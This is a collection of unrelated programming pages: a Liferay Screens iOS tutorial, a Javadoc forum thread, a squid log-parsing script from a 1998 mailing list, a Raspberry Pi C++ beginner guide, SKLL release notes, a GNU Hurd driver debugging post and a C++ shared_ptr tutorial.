Once you’ve prepared your iOS project to use Liferay Screens, you can use Screenlets in your app. There are plenty of Liferay Screenlets available, and they’re described in the Screenlet reference documentation. This tutorial shows you how to insert and configure Screenlets in iOS apps written in Swift and Objective-C. It also explains how to localize them. You’ll be a Screenlet master in no time!

Inserting and Configuring Screenlets in iOS Apps

The first step to using Screenlets in your iOS project is to add a new UIView to your project. In Interface Builder, insert a new UIView into your Storyboard or XIB file. Figure 1 shows this.

Figure 1: Add a new UIView to your project.

Next, enter the Screenlet’s name as the Custom Class. For example, if you’re using the Login Screenlet, then enter LoginScreenlet as the class.

Figure 2: Change the Custom Class to match the Screenlet.

Now you need to conform to the Screenlet’s delegate protocol in your ViewController class. For example, the Login Screenlet’s delegate class is LoginScreenletDelegate. This is shown in the code that follows. Note that you need to implement the functionality of onLoginResponse and onLoginError. This is indicated by the comments in the code here:

class ViewController: UIViewController, LoginScreenletDelegate {
    ...
    func screenlet(screenlet: BaseScreenlet,
            onLoginResponseUserAttributes attributes: [String:AnyObject]) {
        // handle succeeded login using passed user attributes
    }

    func screenlet(screenlet: BaseScreenlet, onLoginError error: NSError) {
        // handle failed login using passed error
    }
    ...

If you’re using CocoaPods, you need to import Liferay Screens in your View Controller:

import LiferayScreens

Now that your ViewController class conforms to the Screenlet’s delegate protocol, go back to Interface Builder and connect the Screenlet’s delegate to your View Controller. If the Screenlet you’re using has more outlets, you can assign them as well.
Note that currently Xcode has some issues connecting outlets to Swift source code. To get around this, you can change the delegate data type or assign the outlets in your code. In your View Controller, follow these steps:

1. Declare an outlet to hold a reference to the Screenlet. You can connect it in Interface Builder without any issues.

Figure 3: Connect the outlet with the Screenlet reference.

2. Assign the Screenlet’s delegate in the viewDidLoad method. This is the connection typically done in Interface Builder.

These steps are shown in the following code for Login Screenlet’s View Controller.

class ViewController: UIViewController, LoginScreenletDelegate {

    @IBOutlet var screenlet: LoginScreenlet?

    override func viewDidLoad() {
        super.viewDidLoad()
        self.screenlet?.delegate = self
    }
    ...

Figure 4: Connect the Screenlet's delegate in Interface Builder.

Awesome! Now you know how to use Screenlets in your apps. If you need to use Screenlets from Objective-C code, follow the instructions in the next section.

Using Screenlets from Objective-C

If you want to invoke Screenlet classes from Objective-C code, there is an additional header file that you must import. You can import the header file LiferayScreens-Swift.h in all your Objective-C files or configure a precompiler header file.

The first option involves adding the following import line to all of your Objective-C files:

#import "LiferayScreens-Swift.h"

Alternatively, you can configure a precompiler header file by following these steps:

1. Create a precompiler header file (e.g., PrefixHeader.pch) and add it to your project.
2. Import LiferayScreens-Swift.h in the precompiler header file you just created.
3. Edit the following build settings of your target. Remember to replace path/to/your/file/ with the path to your PrefixHeader.pch file:

- Precompile Prefix Header: Yes
- Prefix Header: path/to/your/file/PrefixHeader.pch

Figure 5: The `PrefixHeader.pch` configuration in Xcode settings.
You can use the precompiler header file PrefixHeader.pch as a template. Super! Now you know how to use Screenlets from Objective-C code in your apps.

Localizing Screenlets

Follow Apple’s standard mechanism to implement localization in your Screenlet. Note: even though a Screenlet may support several languages, you must also support those languages in your app. In other words, a Screenlet’s support for a language is only valid if your app supports that language. To support a language, make sure to add it as a localization in your project’s settings.

Figure 6: The Xcode localizations in the project's settings.

Way to go! You now know how to use Screenlets in your iOS apps.

Related Topics

- Preparing iOS Projects for Liferay Screens
- Using Themes in iOS Screenlets
- Using Screenlets in Android apps
https://help.liferay.com/hc/ja/articles/360017881492-Using-Screenlets-in-iOS-Apps
import java.text.NumberFormat;

/**
 * @author Alfons Jose Pineda-Knauseder
 * @version 1.0.0
 *
 * This class can be used to represent any products and their information.
 */
public class Product
{
    private String code;
    private String description;
    private double price;

    public Product()
    {
        this("", "", 0);
    }

    /**
     * @param code The code for your product should be entered here as a <code>String</code>.
     * @param description This should be a <code>String</code> that describes your product.
     * @param price This should be the price of your product as a <code>double</code> value.
     */
    public Product(String code, String description, double price)
    {
        this.code = code;
        this.description = description;
        this.price = price;
    }

    public void setCode(String code)
    {
        this.code = code;
    }

    /**
     * @return The product code as a <code>String</code>.
     */
    public String getCode()
    {
        return code;
    }

    public String getDescription()
    {
        return description;
    }

    public double getPrice()
    {
        return price;
    }

    public String getFormattedPrice()
    {
        return NumberFormat.getCurrencyInstance().format(price);
    }

    public boolean equals(Object object)
    {
        if (object instanceof Product)
        {
            Product product2 = (Product) object;
            if (code.equals(product2.getCode())
                    && description.equals(product2.getDescription())
                    && price == product2.getPrice())
                return true;
        }
        return false;
    }

    public String toString()
    {
        return "Code: " + code + "\n"
                + "Description: " + description + "\n"
                + "Price: " + this.getFormattedPrice() + "\n";
    }
}

I need assistance with javadoc
Page 1 of 1
3 Replies - 479 Views - Last Post: 17 May 2014 - 03:46 PM

#1 I need assistance with javadoc
Posted 17 May 2014 - 02:00 PM

I am trying out Javadoc, but the description for my class isn't working. It is blank when I am trying to enter the description. I would like someone to help me. Here is my code.

Replies To: I need assistance with javadoc

#2 Re: I need assistance with javadoc
Posted 17 May 2014 - 02:22 PM

Most of your code is undocumented.

#3 Re: I need assistance with javadoc
Posted 17 May 2014 - 02:42 PM

g00se, on 17 May 2014 - 02:22 PM, said:
Most of your code is undocumented

/**
 * @author Alfons Jose Pineda-Knauseder
 * @version 1.0.0
 *
 * This class can be used to represent any products and their information.
 */
public class Product
{
    private String code;
    private String description;
    private double price;

    public Product()
    {
        this("", "", 0);
    }

I specifically want the description for this class. It is not working. I would also like to point out that my <code></code> tags are not working for some reason as well.

#4 Re: I need assistance with javadoc
Posted 17 May 2014 - 03:46 PM

Alright everybody, I figured out the solution by myself. For future reference, any documentation you put after the @version or @author tags will be part of that tag even if it is on a different line. I just had to put my description above those.

Page 1 of 1
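The fix the poster describes can be shown concretely. Below is a minimal, compilable sketch (the class and method names are illustrative, not from the thread) with the description paragraph placed above the @author/@version tags, which is where the javadoc tool expects it:

```java
/**
 * Demonstrates correct Javadoc ordering: the description comes first,
 * and block tags such as @author and @version come after it. Text
 * placed after a block tag is treated as part of that tag, which is
 * why the original class description rendered blank.
 *
 * @author Example Author
 * @version 1.0.0
 */
public class JavadocDemo
{
    /**
     * @return A greeting as a <code>String</code>.
     */
    public String greet()
    {
        return "hello";
    }

    public static void main(String[] args)
    {
        System.out.println(new JavadocDemo().greet());
    }
}
```

Running `javadoc JavadocDemo.java` on a file laid out this way produces a page with the description visible at the top of the class documentation.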
http://www.dreamincode.net/forums/topic/347105-i-need-assistance-with-javadoc/
This is totally from memory, and untested, but it should get you started.

Requires: Python WebLog classes

To use: cat access_log | ./script_filename

<----- cut here ----->
#!/usr/bin/env python
from weblog import squid, url
import sys

def make_domain(host):
    '''
    take a fully-qualified hostname and return the domain.
    Many ways to do this.
    '''
    import string
    parts = string.split(host, '.')
    if parts[-1] in ['com', 'org', 'net', 'edu', 'gov', 'mil']:
        return string.join(parts[-2:], '.')
    else:
        return string.join(parts[-3:], '.')

o_log = squid.AccessParser(sys.stdin)
log = url.Parser(o_log)
domains = {}

while log.getlogent():
    if log.log_tag != 'TCP_DENIED':
        domain = make_domain(log.url_host)
        domains[domain] = domains.get(domain, 0) + 1

for domain in domains.keys():
    print domain
<----- cut here ----->

> -----Original Message-----
> From: Francis A. Vidal [mailto:francis@usls.edu]
> Sent: Monday, October 05, 1998 3:45 PM
> To: Squid Users List
> Subject: OFF-TOPIC: Help on script
>
> hello everyone,
>
> i'm trying to build a list of sites that i want to ban. i'm getting the
> list from the logfile of all the sites that have been visited by all
> users.
>
> this is the format of the logfile:
>
> 907389399.705 61 192.168.2.57 TCP_HIT/200 2172 GET
> - NONE/-
> image/gif
>
> can someone help me on creating a script that will extract all domains
> that has no TCP_DENIED tag to a file with no duplication? i'm not familiar
> with sed, gawk or perl so i need your help on this.
>
> i would like the format to be (from the above example) one domain per
> line:
>
> excite.com
>
> thanks!
>
> ---
> u s l s N E T university of st. la salle, bacolod city, philippines
> . . . . . . . PGP key at
> francis vidal tel. nos. (6334).435.2324 / 433.3526

Received on Sun Oct 04 1998 - 23:06:31 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:42:20 MST
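For anyone reading this from the archive, here is a self-contained sketch of the same task using only the standard library, with no WebLog dependency. The field positions follow squid's native access.log format as shown in the quoted message; the sample URL is an assumption, since the URL in the original log line did not survive:

```python
def make_domain(host):
    """Reduce a fully-qualified hostname to a registrable domain,
    using the same simple heuristic as the script above."""
    parts = host.split('.')
    if parts[-1] in ('com', 'org', 'net', 'edu', 'gov', 'mil'):
        return '.'.join(parts[-2:])
    return '.'.join(parts[-3:])

def allowed_domains(lines):
    """Collect unique domains from squid access-log lines,
    skipping entries tagged TCP_DENIED."""
    found = set()
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # skip malformed lines
        tag = fields[3].split('/')[0]    # e.g. 'TCP_HIT' from 'TCP_HIT/200'
        host = fields[6].split('/')[2]   # host part of 'http://host/path'
        if tag != 'TCP_DENIED':
            found.add(make_domain(host))
    return sorted(found)

# Hypothetical log line in the quoted format (the URL is invented):
sample = ['907389399.705 61 192.168.2.57 TCP_HIT/200 2172 GET '
          'http://www.excite.com/img/logo.gif - NONE/- image/gif']
print(allowed_domains(sample))  # ['excite.com']
```

Piping a whole access_log through `allowed_domains(sys.stdin)` gives the deduplicated, one-domain-per-line list the question asks for.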
http://www.squid-cache.org/mail-archive/squid-users/199810/0059.html
Hello Instructables! This is my first 'ible, and centered on my favorite hobby. Computer programming! This is no ordinary programming introduction however, as the whole process is 100% compatible, and in fact dedicated to the Raspberry Pi! (I also created this instructable on my pi. It was a little painstaking because I had to use Chromium browser, and anyone who has a pi knows that it is not exactly snappy :) )

The language used in this 'ible will be C++ and the interface through the command line because it is MUCH faster on the pi than trying to use Code::Blocks or some other IDE. Enough blather, let's get to it!

P.S. I am entering this in the coding contest, so if you like it I would LOVE your vote :D

Step 1:

Step 2: Prerequisites

I will assume no knowledge of the topics in this 'ible, so let us start with the prebasics shall we? First of all, you will need a text editor. Preferably one that does syntax highlighting. Here are a few of my faves, and the commands to install them. (Note: I will be using Vim for this Instructable for simplicity, so grab this one if you have no idea what to do.)

First off, open a terminal, or use the login shell on your pi (or other Linux box).

Vim: Command-line text editor with lexer/syntax highlighting. Line number display is default in the lower right hand corner.

SciTE: GUI editor. Also has lexer/syntax highlighting for MANY languages. Line numbering can be turned on in menu/view/line numbering.

Nano: Command line text editor shipped default with Raspbian, no line numbering but a simple interface. Has syntax/lexer highlighting for at least shell scripting and C++.

To install any of these, type into the shell "sudo apt-get install <Name of editor here minus <>>". If you have not updated your package lists recently, type "sudo apt-get update" to refresh the lists. (If you have no idea what I am talking about when I say package lists, type it because yours are old. The package lists hold all the package names available to download.)
You will also need g++ compiler for c++. Type "sudo apt-get install g++" to get it. Okay. Enough boring downloading of software! let's get to making our own already. Step 3: Before the .exe Comes the Code... Well, now that you have downloaded and installed a highlighting text editor, you can get to the tortuous heaven of creating your very own gadgets/schedulers/multiphysics simulators. WAIT I forgot. we need to go through writing C++ code first... Well, let's dive right in. Make your first project file in the terminal by doing something like this: --Create a directory for all your projects like this: <pi@raspberry ~>mkdir /home/pi/Documents/c++ --Navigate into your new directory: <pi@raspberry ~>cd /home/pi/Documents/c++ --Create a directory for this specific project like this: <pi@raspberry ~>mkdir ./helloworld --Navigate into your project directory <pi@raspberry ~>cd ./helloworld Okey dokey. Now you have a whole directory dedicated to your project. Time to get coding. You can create a new C++ file and open vim at the same time by entering the command: vim main.cpp This will create a C++ file called "Main.cpp" in your project folder and enter the Vim CUI. Begin by typing into Vim: :syntax on Including the colon. This is a Vim command-line instruction. It activates syntax highlighting. After this is done, press i on the keyboard to enter into editing mode. The complete code for the ubiquitous Hello World program is below: #include <iostream> int main() { std::cout << "Hello World!" << std::endl; } Now, let's talk a little bit about this. Step 4: Teach a Man to Fish... It is all well and good to splice code snippets together, but to make anything totally original, you need to know the SYNTAX and, (arguably) less important conventions for the language you are trying to use. I will also go over several common C++ types, loops etc. In the example: #include <iostream> int main() { std::cout << "Hello World!" 
<< std::endl; return 0; } I want you to notice several things. Firstly, the "#include" statement in the top line. This includes a header file, and the net result is that the code within the header is "pasted" on top of yours. This is useful if you need to use libraries or create custom classes, the latter out of the scope of this 'ible. I used the include statement to include the iostream header of the standard library into my code. This allows me to write to the standard output and read from the standard input. I used the std::cout object to print "Hello World!" to the shell. This is one of the several objects defined in iostream, which makes it the header that I use the most. Notice that the main part of my code is situated between a set of curly braces after a line that says simply "int main()". This is called a function. It is a block of C++ code that can be executed by calling it by name. Every C++ file meant for executable compilation needs a function called "main". This tells the computer where to start executing the code compiled by g++ to properly run the program. The parentheses after the function are a place to pass arguments to the function (an argument is a variable or constant that can be provided to the function to change its behavior). Beneath the std::cout, there is a "return" statement. This allows the function to give back a value of its own type when called. For instance, this function: int foo(int bar) { int foobar = bar * 5; return foobar; } Called like this: int barfoo = foo(10); would return 50 to be assigned to barfoo. Here is another vital syntax note. Every line needs a semicolon at the end UNLESS IT IS A FUNCTION, LOOP OR CONDITIONAL. Misplaced or unplaced semicolons will cause your code to not compile or to behave erratically. Now that we have some code, let's compile it! Step 5: Soo... Why Did I Get G++ Again? Un-compiled, your code does not do much.
It just kinda sits there looking like a Christmas tree with all its highlighting and being.. text.. So the next and last step in your journey to an executable is compilation! First you will need to save your code and exit Vim. To do this, hit the escape key to enter command mode, and enter the command ":x" This will save the file and exit to the shell. From there simply do this: <pi@raspberry ~>g++ ./main.cpp g++ will compile your code, and unless there are build errors will spit out a file called "a.out". To confirm, enter the command "ls" (ell ess) into the shell, and check for a file named "a.out". Execute your shiny new program like this: <pi@raspberry ~>./a.out You should see something like this: pi@skynet ~ $ mkdir ./Documents/c++ pi@skynet ~ $ cd ./Documents/c++ pi@skynet ~/Documents/c++ $ mkdir ./helloworld pi@skynet ~/Documents/c++ $ cd helloworld pi@skynet ~/Documents/c++/helloworld $ vim main.cpp pi@skynet ~/Documents/c++/helloworld $ g++ ./main.cpp pi@skynet ~/Documents/c++/helloworld $ ls a.out main.cpp pi@skynet ~/Documents/c++/helloworld $ ./a.out This is the line with your program output! \/\/\/ Hello World! pi@skynet ~/Documents/c++/helloworld $ Compiled and run! Give yourself a hug, nice job. Step 6: Error Is the Spice of Life Ah, you are still here! g++ gave you errors, you say? Hmm. Let's take a look. pi@skynet ~/Documents/c++/helloworld $ g++ ./main.cpp ./main.cpp: In function ‘int main()’: ./main.cpp:6:2: error: expected ‘;’ before ‘return’ pi@skynet ~/Documents/c++/helloworld $ Hmm. Looks like someone did not pay attention to the semicolons >.< First off, the compiler tells you that the error is in int main() in main.cpp, so let's look at our main file. Then it tells you that the error is on line 6! Yes, that line you so meticulously typed out. The compiler is the most thorough spellchecker known to man. Let's open Vim back up and take a look-see. vim ./main.cpp #include <iostream> int main() { Caret\/ std::cout << "Hello World!"
<< std::endl || return 0; } ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ Line counter\/ ~ "main.cpp" 7L, 89C 6,1 All Okay, so we are on line six... AH! The compiler was right. Let's fix that line and compile again after exiting Vim. It worked this time? Great! We can learn about a few other helpful things as long as you came back. Step 7: It's Time to Operate Doctor! Before you can progress to loops and conditionals, you will need to know the C++ comparison and mathematical operators. There are quite a few to remember, but proficiency will come with practice. Here is the list: == Comparison operator "is equal" != Comparison operator "is not equal" <= Comparison operator "is less than or equal to" >= Comparison operator "is greater than or equal to" < Comparison operator "less than" > Comparison operator "greater than" || Conditional operator "or" && Conditional operator "and" = Assignment operator "equals" + Math operator "add" - Math operator "subtract" / Math operator "divide" * Math operator "multiply" -- Math operator "decrement" ++ Math operator "increment" % Math operator "remainder of division" Step 8: Extreme Conditioning Well, we have looked at the VERY basics of C++ in our example program, but what if you want your code to have two possible outcomes? Statements called CONDITIONALS were born for the task. There are three basic conditionals. Namely: if else switch if/else statements are the easiest, so let's start there. In this example code: if (1 == 1) { std::cout << "The universe has survived!"; } else { std::cout << "This computer no longer exists..."; } IF one is equal to one, print one thing, ELSE print something else. Notice the "==" operator instead of "=": "==" is a comparison whereas "=" is an assignment.
Here are some other operators: != Is not equal to ++ Increment by one -- Decrement by one + Add && And || Or >= Greater than / equal to <= Less than / equal to / Divide * Multiply - Subtract % Modulus, finds the remainder of a division Those are all of the non-advanced C++ default operators, and all you should need for both conditional statements and loops. Let's get to the next statement, switch. int foo = 3; switch(foo) { case 1: std::cout << "One"; break; case 2: std::cout << "Two"; break; case 3: std::cout << "Three"; break; } In a switch, the case whose value matches the value of the variable used (must be an int or enum) is selected and run. The break keeps execution from falling through into the cases below. You may also add a default case to the end to handle an input outside what is expected. Step 9: Getting Loopy Another critical element of C++ is the loop. There are three kinds of loops: while, for and do. Let us begin with the while loop. int foo = 0; while (foo < 100) { std::cout << foo; foo++; } This code snippet will print every integral number from 0 to 99 to the console. The syntax of a while loop is: while(condition) {COMMANDS} The loop will run as long as condition is evaluated as true. You can make an infinite loop by putting '1' or "true" as the condition. Here is a snippet of a for loop: for (int i = 0; i < 100; i++) { std::cout << i; } This kind of loop is good for applications where you want to perform an incremental operation such as looking at each letter of a string or each element of an array. The syntax of a for loop is: for (initialization; condition; update) {COMMANDS} The code snippet from above initializes an integer variable 'i' and runs the loop as long as i's value is less than 100, incrementing it every loop cycle. The last loop to go over is a do. Here is another snippet: do { std::cout << "Spam"; } while(true); Syntax is: do {COMMANDS} while(condition); The do is very similar to the while, except it is guaranteed to run at least once.
Also, notice the semicolon after the while portion. It is easy to forget. This loop will run forever because the "true" inside the parentheses is equivalent to saying if 1 == 1. Step 10: Do You Know How to Type? Unlike in most scripting languages, in C++ you have to define the type of any variable you create. That is, what kind of value it will hold. I will go over the VERY basic types, because there are a tremendous number of types (several hundred) and it would take hours to type them all. So here are the basic types: int An integer number float A floating-point number; holds decimals double Similar to a float, but has greater precision bool A Boolean value. Either true or false (0 or 1) std::string A sequence of characters, requires the <string> header char A single character To declare and initialize a variable, use this syntax: typename name = value; So you could initialize an integer variable with a value of sixteen like this: int foo = 16; You can make an ARRAY of any type by declaring it like this: type NAME [integer value] = {values}; This will create an array with a number of elements equal to the value between the brackets. You can index an array like this: int foo[3] = {1,2,3}; std::cout << foo[0] << " " << foo[2]; This would output 1 3. Array indexing begins at zero. Step 11: Whaddya Gonna Do Now Coder? Well, your short time in my tutelage has come to an end (for now). For your further edification and education, check out these sites: stackoverflow cplusplus.com stackexchange Happy coding! Dominic
http://www.instructables.com/id/Pi-3142-3143/
SciKit-Learn Laboratory v2.1 Release Notes Release Date: 2020-03-13 // over 1 year ago This is a minor release of SKLL with the only change being that it is now compatible with scikit-learn v0.22.2. ⚡️ There are several changes in scikit-learn v0.22 that might cause several estimators and functions to produce different results even when fit with the same data and parameters. Therefore, SKLL 2.1 can also yield different results compared to previous versions even with the same data and same settings. ⚡️ 🍱 💡 New features 💡 🍱 🔎 Other minor changes 🔎 - ⚡️ Update imports to align with the new scikit-learn API. - 🛠 A minor bugfix in logutils.py. - ⚡️ Update some test outputs due to changes in scikit-learn models and functions. - 🚀 Update some tests to make pre-release testing for conda and PyPI packages possible. 🍱 👩🔬 Contributors 👨🔬 (Note: This list is sorted alphabetically by last name and not by the quality/quantity of contributions to this release.) Aoife Cahill (@aoifecahill), Binod Gyawali (@bndgyawali), Matt Mulholland (@mulhod), Nitin Madnani (@desilinguist), and Mengxuan Zhao (@chaomenghsuan). Previous changes from v2.0 🛠 This is a major new release. It's probably the largest SKLL release we have ever done since SKLL 1.0 came out! It includes dozens of new features, bugfixes, and documentation updates! ⚡️ SKLL 2.0 is backwards incompatible with previous versions of SKLL and might yield different results compared to previous versions even with the same data and same settings. ⚡️ 🍱 💥 Incompatible Changes 💥 ✅ Python 2.7 is no longer supported since the underlying version of scikit-learn no longer supports it (Issue #497, PR #506). 🔧 Configuration field objective has been deprecated and replaced with objectives, which allows specifying multiple tuning objectives for grid search (Issue #381, PR #458). 🔧 Grid search is now enabled by default in both the API as well as while using a configuration file (Issue #463, PR #465).
✅ The Predictor class previously provided by the generate_predictions utility script is no longer available. If you were relying on this class, you should just load the model file and call Learner.predict() instead (Issue #562, PR #566). ✅ There are no longer any default grid search objectives since the choice of objective is best left to the user. Note that since grid search is enabled by default, you must either choose an objective or explicitly disable grid search (Issue #381, PR #458). mean_squared_error is no longer supported as a metric. Use neg_mean_squared_error instead (Issue #382, PR #470). The cv_folds_file configuration file field is now just called folds_file (Issue #382, PR #470). ✅ Running an experiment with the learning_curve task now requires specifying metrics in the Output section instead of objectives in the Tuning section (Issue #382, PR #470). 👀 Previously when reading in CSV/TSV files, missing data was automatically imputed as zeros. This is not appropriate in all cases. This is no longer the case and blanks are retained as is. Missing values will need to be explicitly dropped or replaced (see below) before using the file with SKLL (Issue #364, PRs #475 & #518). ✅ pandas and seaborn are now direct dependencies of SKLL, and not optional (Issues #455 & #364, PRs #475 & #508). 🍱 💡 New features 💡 👀 CSVReader/CSVWriter & TSVReader/TSVWriter now use pandas as the backend rather than custom code that relied on the csv module. This leads to significant speedups, especially for very large files (~5x for reading and ~10x for writing)! The speedup comes at the cost of a moderate increase in memory consumption. See detailed benchmarks here (Issue #364, PRs #475 & #518). ✅ SKLL models now have a new pipeline attribute which makes it easy to manipulate and use them in scikit-learn, if needed (Issue #451, PR #474). ⚡️ scikit-learn updated to 0.21.3 (Issue #457, PR #559).
📦 The SKLL conda package is now a generic Python package which means the same package works on all platforms and on all Python versions >= 3.6. This package is hosted on the new, public ETS anaconda channel. ⚡️ SKLL learner hyperparameters have been updated to match the new scikit-learn defaults and those upcoming in 0.22.0 (Issue #438, PR #533). ✅ Intermediate results for the grid search process are now available in the results.json files (Issue #431, #471). ✅ The K models trained for each split of a K-fold cross-validation experiment can now be saved to disk (Issue #501, PR #505). ✅ Missing values in CSV/TSV files can be dropped/replaced both via the command line and the API (Issue #540, PR #542). ✅ Warnings from scikit-learn are now captured in SKLL log files (Issue #441, PR #480). 🖨 Learner.model_params() and, consequently, the print_model_weights utility script now work with models trained on hashed features (Issue #444, PR #466). The print_model_weights utility script can now output feature weights sorted by class labels to improve readability (Issue #442, PR #468). ✅ The skll_convert utility script can now convert feature files that do not contain labels (Issue #426, PR #453). 🛠 Bugfixes & Improvements 🛠 🛠 Fix several bugs in how various tuning objectives and output metrics were computed (Issues #545 & #548, PR #551). Fix how pos_label_str is documented, read in, and used for classification tasks (Issues #550 & #570, PRs #566 & #571). Fix several bugs in the generate_predictions utility script and streamline its implementation to not rely on an externally specified positive label or index but rather read it from the model file or infer it (Issues #484 & #562, PR #566). 🛠 Fix a bug due to overlap between tuning objectives and output metrics that could prevent metric computation (Issue #564, PR #567). ✅ Using an externally specified folds_file for grid search now works for evaluate and predict tasks, not just train (Issue #536, PR #538).
Fix incorrect application of sampling before feature scaling in Learner.predict() (Issue #472, PR #474). ✅ Disable feature sampling for the MultinomialNB learner since it cannot handle negative values (Issue #473, PR #474). ➕ Add missing logger attribute to Learner.FilteredLeaveOneGroupOut (Issue #541, PR #543). Fix FeatureSet.has_labels to recognize a list of None objects, which is what happens when you read in an unlabeled data set and pass label_col=None (Issue #426, PR #453). 🛠 Fix a bug in ARFFWriter that adds/removes label_col from the field names even if it's None to begin with (Issue #452, PR #453). ✅ Do not produce unnecessary warnings for learning curves (Issue #410, PR #458). ✅ Show a warning when applying feature hashing to multiple feature files (Issue #461, PR #479). 🛠 Fix loading issue for saved MultinomialNB models (Issue #573, PR #574). ⬇️ Reduce memory usage for learning curve experiments by explicitly closing matplotlib figure instances after they are saved. 👌 Improve SKLL's cross-platform operation by explicitly reading and writing files as UTF-8 in readers and writers and by using the newline parameter when writing files. 📚 📖 Documentation Updates 📖 📚 Reorganize documentation to explicitly document all types of output files and link them to the corresponding configuration fields in the Output section (Issue #459, PR #568). ➕ Add a new interactive tutorial that uses a Jupyter notebook hosted on binder (Issue #448, PRs #547 & #552). ➕ Add a new page to the official documentation explaining how the SKLL code is organized for new developers (Issue #511, PR #519). 📚 Update SKLL contribution guidelines and link to them from the official documentation (Issues #498 & #514, PRs #503 & #519). 📚 Update documentation to indicate that pandas and seaborn are now direct dependencies and not optional (Issue #553, PR #563). 📚 Update LogisticRegression learner documentation to talk explicitly about penalties and solvers (Issue #490, PR #500).
✅ Properly document the internal conversion of string labels to ints/floats and possible edge cases (Issue #436, PR #476). ➕ Add feature scaling to the Boston regression example (Issue #469, PR #478). 📚 Several other additions/updates to documentation (Issue #459, PR #568). ✔️ Tests ✔️ 📦 Make tests into a package so that we can do something like from skll.tests.utils import X etc. (Issue #530, PR #531). ➕ Add new tests based on SKLL examples so that we would know if examples ever break with any SKLL updates (Issues #529 & #544, PR #546). 🏁 Tweak tests to make the test suite runnable on Windows (and pass!). ➕ Add Azure Pipelines integration for automated test builds on Windows. ➕ Added several new comprehensive tests for all new features and bugfixes. Also removed older, unnecessary tests. See the various PRs above for details. ✅ Current code coverage for SKLL tests is at 95%, the highest it has ever been! 🍱 🔍 Other changes 🔍 ✅ Replace prettytable with the more actively maintained tabulate (Issue #356, PR #467). ✅ Make sure the entire codebase complies with PEP8 (Issue #460, PR #568). ⚡️ Update the year to 2019 everywhere (Issue #447, PRs #456 & #568). ⚡️ Update the TravisCI configuration to use conda_requirements.txt for building the environment (PR #515). 🍱 👩🔬 Contributors 👨🔬 (Note: This list is sorted alphabetically by last name and not by the quality/quantity of contributions to this release.) Supreeth Baliga (@SupreethBaliga), Jeremy Biggs (@jbiggsets), Aoife Cahill (@aoifecahill), Ananya Ganesh (@ananyaganesh), R. Gokul (@rgokul), Binod Gyawali (@bndgyawali), Nitin Madnani (@desilinguist), Matt Mulholland (@mulhod), Robert Pugh (@Lguyogiro), Maxwell Schwartz (@maxwell-schwartz), Eugene Tsuprun (@etsuprun), Avijit Vajpayee (@AVajpayeeJr), Mengxuan Zhao (@chaomenghsuan)
https://python.libhunt.com/skll-latest-version
Hi Neal, --- "Neal H. Walfield" <address@hidden> wrote: > My impression is that the fourth argument to > device_open is a send > right to the device... ... of type device_t. > ... which is supplied as the first argument to > device_read et al. of type device_t. I checked include/device/device.defs and it mentions device_t. > Also, make sure that you add your lprread function > to the lpr device > structure (i.e. along side lpropen). This I did. :) So, this is what I have now in test.c on hurd: static device_t lpr_dev; device_t device_master; error_t err; unsigned long result; err = get_privileged_ports (0, &device_master); err = device_open (device_master, D_READ | D_WRITE, "lpr", &lpr_dev); mach_msg_type_number_t data_cnt = sizeof (result); err = device_read (lpr_dev, 0, -1, sizeof (result), (void *) &result, &data_cnt); On i386/i386at/lpr.c in gnumach-1-branch, I have lprread(dev, ior) int dev; io_req_t ior; { register int err; unsigned long data = 0x5a5a; printf("lpr.c: lprread()...\n"); /* err = device_read_alloc (ior, (vm_size_t) ior->io_count); if (err != KERN_SUCCESS) return (err); */ ior->io_data = data; ior->io_residual = ior->io_count - sizeof (data); return (D_SUCCESS); } On executing test with re-compiled driver, the "lpr.c: lprread()" gets printed, and then I get: panic: pmap_remove: null pv_list! and then it reboots. Even if I tried to uncomment the lines in lprread for device_read_alloc, the same panic occurs. Any suggestions on what is wrong? OR Is it possible for you to give me a simple example wherein you send an unsigned long variable's address through device_read on hurd, and its value gets assigned in lprread in gnumach-1-branch and returned? 
Thanks for your help, SK ------------------------------------------------------------ Shakthi Kannan, MS Software Engineer, Specsoft (Hexaware Technologies) [E]: address@hidden [M]: (91) 98407-87007 [W]: [L]: Chennai, India ------------------------------------------------------------
http://lists.gnu.org/archive/html/bug-hurd/2005-09/msg00165.html
Smart Pointers (3/6): std::shared_ptr Automatic memory management, alias garbage collection, provides the release of memory which was allocated by the program but is no longer referenced. C++ has no explicit garbage collector mechanism. Quotation from Bjarne Stroustrup: “I don't like garbage. I don't like littering. My ideal is to eliminate the need for a garbage collector by not producing any garbage. That is now possible. Tools supporting and enforcing the programming techniques that achieve that are being produced.” Since C++11, we have a strong resource-owning and resource-sharing class to manage the lifetime of an object: std::shared_ptr. A shared smart pointer allows more than one owner during the lifetime of the object. Shared pointer class instances may own the same object. The sharing mechanism works through copying, moving and assigning shared pointer objects. The shared pointer class holds two pointers, in contrast to the unique pointer class. These pointers are the owned object pointer and the control block pointer. What is the control block? Unique pointers don't share any object; a unique pointer only holds the owned object. But if we want to share this owned object, we need a bigger mechanism. We need to keep more sharing-related data, such as the counters and the deleter. That's why the size of the shared pointer is bigger than the unique pointer. As we said, the shared pointer contains two pointers: one of them is the owned object pointer, the other is the control block pointer. The control block's memory is not part of the shared pointer class. The shared pointer object only keeps its pointer. Suppose we have a class named embeddedWorld. We create an embeddedWorld class object with a shared pointer. In total, three shared pointers point to the same object. Every new shared pointer increments the reference count in the control block. If a shared pointer goes out of scope or is reset, the reference count decrements.
When the reference count reaches zero, the owned object is deleted by the control block. The diagram of this example, and the code in which the object is pointed to in three ways, are below. The diagram of three shared pointer instances #include <iostream> #include <memory> using namespace std; class embeddedWorld { public: embeddedWorld(int p_no): planetNo(p_no) {} int getPlanetNo() const { return planetNo; }; private: int planetNo = 0; }; int main() { std::shared_ptr<embeddedWorld> e1(make_shared<embeddedWorld> (10)); std::shared_ptr<embeddedWorld> e2; e2 = e1; //copy assignment std::shared_ptr<embeddedWorld> e3(e2); //copy constructor cout << "e3.use_count(): " << e3.use_count() << endl; return 0; } The output of the code above is: “e3.use_count(): 3” The Aliasing Constructor: shared_ptr( const shared_ptr& r, element_type* ptr ) noexcept A shared pointer instance can be constructed with another shared pointer (r) to share ownership, but it can hold a different pointer (ptr). When we dereference it, it always returns ptr. When all shared pointers go out of scope or are reset, the unmanaged pointer ptr remains. The responsibility for the unmanaged pointer ptr belongs to us. Here is a little example of using the aliasing constructor.
